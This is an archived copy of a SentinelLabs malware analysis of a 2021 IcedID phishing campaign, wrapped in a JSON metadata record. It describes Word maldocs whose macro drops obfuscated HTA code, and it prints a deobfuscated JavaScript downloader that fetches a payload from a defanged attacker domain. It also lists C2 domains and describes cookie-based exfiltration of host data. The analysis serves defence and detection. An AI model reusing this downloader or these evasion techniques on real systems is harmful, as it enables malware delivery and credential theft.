{
	"id": "b4d99f8a-ebd3-4989-8cae-1a68fb355579",
	"created_at": "2026-04-10T03:21:08.688377Z",
	"updated_at": "2026-04-10T13:12:06.950754Z",
	"deleted_at": null,
	"sha1_hash": "1133a402034b4a9d4409cba7d3c1ce950b58a65b",
	"title": "Evasive Maneuvers | Massive IcedID Campaign Aims For Stealth with Benign Macros - SentinelLabs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 10519405,
	"plain_text": "Evasive Maneuvers | Massive IcedID Campaign Aims For Stealth\r\nwith Benign Macros - SentinelLabs\r\nBy Marco Figueroa\r\nPublished: 2021-06-24 · Archived: 2026-04-10 03:11:36 UTC\r\nExecutive Summary\r\nSentinelLabs has uncovered a recent IcedID campaign and analyzed nearly 500 artifacts associated with\r\nthe attacks.\r\nIcedID Office macro documents use multiple techniques in an attempt to bypass detection.\r\nTo further obfuscate the attack, data embedded in the document itself is used by the malicious macro.\r\nAnalyzing only the macro provides an incomplete view of the attack.\r\nThe HTA dropper embedded in the document is obfuscated JavaScript, which executes in memory and\r\nutilizes additional techniques to evade AV/EDR.\r\nOverview\r\nMany security researchers thought that IcedID would be the successor to Emotet after the coordinated takedown\r\nof Emotet malware in early 2021 by law enforcement agencies. IcedID (aka BokBot) was designed as a banking\r\ntrojan targeting victims’ financial information and acting as a dropper for other malware. Initially discovered in\r\n2017, IcedID has become a prominent component in financially-driven cybercrime. The malware is primarily\r\nspread via phishing emails typically containing Office file attachments. The files are embedded with malicious\r\nmacros that launch the infection routine, which retrieves and runs the payload.\r\nIn May 2021, SentinelLabs observed a new campaign delivering IcedID through widespread phishing emails laced\r\nwith poisoned MS Word attachments that use a simple but effective technique to avoid suspicion. This ongoing\r\nIcedID campaign attempts to gain a foothold on the victim’s machine through a crafted Word doc in which the\r\nembedded macro itself does not contain any malicious code.\r\nJust like a genuine macro, the IcedID macro operates on the content of the document itself. In this case, that\r\ncontent includes obfuscated JavaScript code. This simple technique helps to evade many automated static and\r\ndynamic analysis engines since the content’s malicious behavior is dependent upon execution through an MS\r\nOffice engine.\r\nThe obfuscated JavaScript is responsible for dropping a Microsoft HTML Application (HTA) file to\r\nC:UsersPublic . The macro then employs Internet Explorer’s mshta.exe utility to execute the HTA file. This\r\nsecond stage execution reaches out to the attacker’s C2 and downloads a DLL file with a .jpg extension to the\r\nsame Public folder. The HTA file calls rundll32 to execute this payload, which serves to collect and exfiltrate\r\nuser data to the attacker’s C2.\r\nBelow we present further technical details of this recent campaign from examination of almost 500 artifacts.\r\nhttps://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/\r\nPage 1 of 11\n\nTechnical Analysis\r\nThe IcedID phishing email contains what looks like an innocuous enough Word attachment. As expected with\r\nthese kinds of malware operations, opening the document prompts the user to enable editing and then ‘Enable\r\ncontent’.\r\nTargets are prompted to enable macros when opening the maldoc\r\nWhat is unexpected is that the macro itself is uninteresting.\r\nThe VBA macros contained in the document\r\nIn this case, the malicious code is found within the document itself, reversed JavaScript that is then base64\r\nencoded.\r\nhttps://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/\r\nPage 2 of 11\n\nObfuscated code in the document.xml\r\nThe MS Word macro writes this code out as an HTA file to C:UsersPublic . While this ensures success in terms\r\nof user permissions, arguably this is an operational mistake from the attacker’s side in the sense that this folder is a\r\nlocation generally monitored by security products.\r\nThe HTA code is executed by the macro using the GetObject() and Navigate() functions. This behavior is a\r\n“VB Legacy” technique that conforms to how older Office macro files behave.\r\nPart of the VBA code embodied in the Word Document\r\nOnce the HTA code is running, it deobfuscates the JavaScript code in-memory and utilizes two additional\r\ntechniques in an attempt to evade AV/EDR security controls:\r\nThe HTA file contains msscriptcontrol.scriptcontrol COM component, which is used to execute\r\ninteractively with JavaScript.\r\nhttps://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/\r\nPage 3 of 11\n\nThe code calls JavaScript functions from VBScript code within the HTA. This technique also confuses\r\ndifferent code and activity tracking engines within certain endpoint security products.\r\nHTA file dropped in the Public folder\r\nBelow is the deobfuscated and ‘beautified’ version of the code from the HTA file.\r\nvar memoryVb = new ActiveXObject(\"msxml2.xmlhttp\");\r\nmemoryVb.open(\"GET\", \"hxxp[:]//awkwardmanagement2013z[.]com/adda/hMbq4kHp63r/qv2KrtCyxsQZG2qnnjAyyS2T\r\nmemoryVb.send();\r\nif (memoryVb.status == 200) {\r\ntry {\r\nvar rightClass = new ActiveXObject(\"adodb.stream\");\r\nrightClass.open;\r\nrightClass.type = 1;\r\nrightClass.write(memoryVb.responsebody);\r\nrightClass.savetofile(\"c:userspublicsizeTempStruct.jpg\", 2);\r\nrightClass.close;\r\n} catch (e) {}\r\n}\r\nThe code initializes an MSXML2.XMLHTTP request and specifies the method, URL, and authentication\r\ninformation for the request. If the URL responds with a status code of 200, the code proceeds by downloading the\r\nremote file with a “.jpg” file extension. Unsurprisingly, the file is not what it pretends to be.\r\nLooking at related domains by the same actor shows the breadth of activity. When tracking this campaign, the\r\ndomain mappingmorrage[.]top had numerous duplicates of the “.jpg” file and the second stage binary associated\r\nwith this campaign. Multiple file names are used such as “sizeQuery.jpg”, “sizeTempStruct.jpg”,\r\n“tmpSizeLocal.jpg” and so on.\r\nhttps://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/\r\nPage 4 of 11\n\nIcedID related files on VirusTotal\r\nIcedID JPG/DLL\r\nChanging file extensions is a common, if unsophisticated, technique aimed at evasion. In this case, the “.jpg” file\r\nis actually a DLL. Analysis of the file’s exports reveals the DLLRegisterServer function, which is an obvious\r\ncandidate for the initial installer of the IcedID malware.\r\nhttps://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/\r\nPage 5 of 11\n\nPE Studio\r\nTo unpack this binary, we can load rundll32.exe in xdbg64 and use the command line option to specify the\r\nexported function in sizeTeamStruct.dll , as shown in the screenshot below.\r\nLoading rundll + DLL with the exported function\r\nTo get to the packed binary, we need to add a breakpoint on VirtualAlloc and execute the run command until\r\nthe breakpoint is hit. We want to look for the call that is responsible for allocating memory in the address space\r\nand dump the binary from the address location.\r\nhttps://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/\r\nPage 6 of 11\n\nUnpacked IcedID\r\nLooking at the dumped binary in PE Studio what catches the attention are the WinHttpOpenRequest ,\r\nWinHttpSendRequest , and WinHttpReceiveResponse functions.\r\nThe WinHttpOpenRequest creates an HTTP request handle and stores the specified parameters in that handle,\r\nwhile WinHttpSendRequest sends the specified request to the C2 server and the WinHttpReceiveResponse waits\r\nto receive the response.\r\nhttps://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/\r\nPage 7 of 11\n\nPE Studio with the unpacked IcedID\r\nAfter loading the binary into xdbg64, we add the breakpoint on WinHttpOpenRequest . When this breakpoint is\r\nhit, we can see from the disassembly that the code is generating the domain through an xoring operation. This\r\nhelps us to understand how the C2 value is generated.\r\nhttps://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/\r\nPage 8 of 11\n\nhttps://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/\r\nPage 9 of 11\n\nChecking aws.amazon.com connectivity\r\nSome of the domains collected from our analysis of around 500 samples of IcedID included:\r\nepicprotovir[.]download\r\nessoandmobilcards[.]com\r\nimmotransfer[.]top\r\nkickersflyers[.]bid\r\nmappingmorrage[.]top\r\nmomenturede[.]fun\r\nprovokordino[.]space\r\nquadrogorrila[.]casa\r\nvaclicinni[.]xyz\r\nvikolifer[.]top\r\nThese appear to be masked through CloudFlare IPs. For example,\r\nhxxp[://]mappingmorrage[.]top/\r\n172.67.196.74\r\n104.21.57.254\r\n2606:4700:3037::6815:39fe\r\n2606:4700:3037::ac43:c44a\r\nThe malware’s main module functions to steal credentials from the victim’s machine, exfiltrating information back\r\nto the C2 server.\r\nA cookie which has information from the infected host is sent to the C2 and contains the OS type, username,\r\ncomputer name, and CPU domain, giving the operators a good understanding of the compromised environment.\r\nhttps://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/\r\nPage 10 of 11\n\n__gads:\r\n_gat: Windows version info 6.3.9600.64 is Windows 8.1 64bit\r\n_ga: Processor CPUID information\r\n_u: Username and Computername DESKTOP-FRH1VBHMarcoFB35A6FF06678D37\r\n__io: Domain id\r\n_gid: NIC\r\nIceID exfiltrates environmental data via a cookie\r\nDiscovering network traffic with the headers listed above is an indication that the host has been infected with\r\nIcedID malware.\r\nConclusion\r\nMany IcedID attacks begin with a phishing email and users opening the attachment. In this campaign, IcedID uses\r\na maldoc in the initial infection stage in an attempt to bypass defenses by interacting with the contents of the\r\ndocument itself. The use of an HTA file with its dependency on IE’s mshta.exe is reasonably unusual behavior\r\nthat defenders can monitor for in their environments. This, along with other techniques such as changing the file\r\nextension and the behavior of the DLL, should be detected by a capable Next Gen security solution.\r\nIndicators of Compromise\r\nhttps://github.com/SentineLabs/icedID\r\nSource: https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/\r\nhttps://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/\r\nPage 11 of 11",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/"
	],
	"report_names": [
		"evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros"
	],
	"threat_actors": [],
	"ts_created_at": 1775791268,
	"ts_updated_at": 1775826726,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1133a402034b4a9d4409cba7d3c1ce950b58a65b.pdf",
		"text": "https://archive.orkl.eu/1133a402034b4a9d4409cba7d3c1ce950b58a65b.txt",
		"img": "https://archive.orkl.eu/1133a402034b4a9d4409cba7d3c1ce950b58a65b.jpg"
	}
}